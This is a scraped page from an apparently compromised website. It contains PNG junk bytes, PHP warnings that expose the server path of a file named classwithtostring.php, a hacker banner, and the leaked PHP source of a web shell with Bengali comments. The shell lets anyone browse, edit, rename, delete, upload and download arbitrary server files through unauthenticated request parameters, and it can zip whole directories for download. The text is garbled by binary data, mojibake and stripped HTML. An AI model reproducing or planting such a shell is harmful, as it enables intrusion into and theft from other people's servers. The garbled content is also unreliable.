?ĄëPNG  IHDR ? f ??C1 sRGB ??¨Ļ gAMA ĄĀ? ¨ša pHYs ? ??oĄ§d GIDATx^¨Ē¨šLĄąĄÂeĄÂY?a?("Bh?_¨°???ĄéĄė?q5k?*:t0A-o??Ŗ¤]VkJĄéM??f?ĄĀ8\k2¨ĒllĄę1]q?¨´???T
Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /home/user1137782/www/china1.by/classwithtostring.php on line 86

Warning: Cannot modify header information - headers already sent by (output started at /home/user1137782/www/china1.by/classwithtostring.php:6) in /home/user1137782/www/china1.by/classwithtostring.php on line 213

Warning: Cannot modify header information - headers already sent by (output started at /home/user1137782/www/china1.by/classwithtostring.php:6) in /home/user1137782/www/china1.by/classwithtostring.php on line 214

Warning: Cannot modify header information - headers already sent by (output started at /home/user1137782/www/china1.by/classwithtostring.php:6) in /home/user1137782/www/china1.by/classwithtostring.php on line 215

Warning: Cannot modify header information - headers already sent by (output started at /home/user1137782/www/china1.by/classwithtostring.php:6) in /home/user1137782/www/china1.by/classwithtostring.php on line 216

Warning: Cannot modify header information - headers already sent by (output started at /home/user1137782/www/china1.by/classwithtostring.php:6) in /home/user1137782/www/china1.by/classwithtostring.php on line 217

Warning: Cannot modify header information - headers already sent by (output started at /home/user1137782/www/china1.by/classwithtostring.php:6) in /home/user1137782/www/china1.by/classwithtostring.php on line 218
iamH4CKEERRRRRRRRRRRS

I am a hacker in the dark of a very cold night

path :

upload file:

List of files:

'; echo '

Edit the file: ' . basename($file_to_edit) . '

'; echo ''; echo ''; echo '
'; echo ''; echo ''; } else { echo ""; } } // āĻĢāĻžāχāϞ⧇āϰ āĻāĻĄāĻŋāϟ āϏ⧇āĻ­ āĻ•āϰāĻžāϰ āĻ…āĻ‚āĻļ if (isset($_POST['save_edits'])) { $edited_content = $_POST['edited_content']; $file_to_edit = $_GET['edit']; if (file_exists($file_to_edit)) { file_put_contents($file_to_edit, $edited_content); echo ""; } else { echo ""; } } $current_dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd(); // āĻŦāĻ°ā§āϤāĻŽāĻžāύ āĻĄāĻŋāϰ⧇āĻ•ā§āϟāϰāĻŋ if (!is_dir($current_dir)) { $current_dir = getcwd(); // āϝāĻĻāĻŋ āĻĄāĻŋāϰ⧇āĻ•ā§āϟāϰāĻŋ āύāĻž āĻšā§Ÿ, āϤāĻŦ⧇ āĻĄāĻŋāĻĢāĻ˛ā§āϟ āĻŦāĻ°ā§āϤāĻŽāĻžāύ āĻĄāĻŋāϰ⧇āĻ•ā§āϟāϰāĻŋāϤ⧇ āϰāĻŋāĻĄāĻžāχāϰ⧇āĻ•ā§āϟ āĻ•āϰāĻž āĻšāĻŦ⧇ } $files = scandir($current_dir); // āĻĄāĻŋāϰ⧇āĻ•ā§āϟāϰāĻŋāϰ āϏāĻŦ āĻĢāĻžāχāϞ āĻŦ⧇āϰ āĻ•āϰāĻž foreach ($files as $file) { if ($file !== '.' && $file !== '..') { $full_path = $current_dir . '/' . $file; $is_dir = is_dir($full_path); echo ""; echo ""; echo ""; echo ""; echo ""; // āĻĒāĻžāϰāĻŽāĻŋāĻļāύ āĻĻ⧇āĻ–āĻžā§Ÿ echo ""; echo ""; } } ?>
name file size edit permission action
" . ($is_dir ? "" . $file . "" : $file) . "" . ($is_dir ? '-' : filesize($full_path) . " KB") . "" . date("F d Y H:i:s", filemtime($full_path)) . "" . substr(sprintf('%o', fileperms($full_path)), -4) . "
alert('File deleted successfully!');window.location.href='';"; } else { echo ""; } } // āĻĢāĻžāχāϞ āϰāĻŋāύ⧇āĻŽ āĻ•āϰāĻž if (isset($_POST['rename'])) { $oldname = $_POST['oldname']; $newname = $_POST['newname']; if (file_exists($current_dir . '/' . $oldname)) { rename($current_dir . '/' . $oldname, $current_dir . '/' . $newname); echo ""; } else { echo ""; } } // āĻĢāĻžāχāϞ āφāĻĒāϞ⧋āĻĄ āĻ•āϰāĻž if (isset($_POST['upload'])) { $target_dir = $current_dir . "/"; $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]); if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo ""; } else { echo ""; } } // āĻĢāĻžāχāϞ āĻĄāĻžāωāύāϞ⧋āĻĄ āĻ•āϰāĻž (āĻāĻ•āϟāĻŋ āĻĢāĻžāχāϞ) if (isset($_GET['download'])) { $file_to_download = $_GET['download']; if (file_exists($file_to_download)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file_to_download) . '"'); header('Content-Length: ' . filesize($file_to_download)); readfile($file_to_download); exit; } else { echo ""; } } // āϏāĻŦ āĻĢāĻžāχāϞ āĻĄāĻžāωāύāϞ⧋āĻĄ āĻ•āϰāĻž (ZIP) if (isset($_POST['download_all'])) { // ZIP āĻĢāĻžāχāϞ⧇āϰ āύāĻžāĻŽ āĻāĻŦāĻ‚ āĻ…āĻŦāĻ¸ā§āĻĨāĻžāύ $zip_file = 'all_files.zip'; // ZIP āĻ•ā§āϞāĻžāϏ āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇ āĻĢāĻžāχāϞ āĻ•āĻŽā§āĻĒā§āϰ⧇āϏ āĻ•āϰāĻž $zip = new ZipArchive(); if ($zip->open($zip_file, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) { // āĻĄāĻŋāϰ⧇āĻ•ā§āϟāϰāĻŋāϰ āĻĢāĻžāχāϞāϗ⧁āϞ⧋ āϞ⧁āĻĒ āĻ•āϰ⧇ ZIP āĻ āϝ⧋āĻ— āĻ•āϰāĻž $files = scandir($current_dir); foreach ($files as $file) { if ($file !== '.' && $file !== '..') { $file_path = $current_dir . '/' . $file; if (is_file($file_path)) { $zip->addFile($file_path, basename($file_path)); } } } $zip->close(); // ZIP āĻĢāĻžāχāϞ āĻĄāĻžāωāύāϞ⧋āĻĄ āĻ•āϰāĻž header('Content-Type: application/zip'); header('Content-Disposition: attachment; filename="' . basename($zip_file) . '"'); header('Content-Length: ' . filesize($zip_file)); flush(); readfile($zip_file); // āĻĄāĻžāωāύāϞ⧋āĻĄ āĻļ⧇āώ⧇ ZIP āĻĢāĻžāχāϞ āĻŽā§āϛ⧇ āĻĢ⧇āϞāĻž unlink($zip_file); exit; } else { echo ""; } } ?>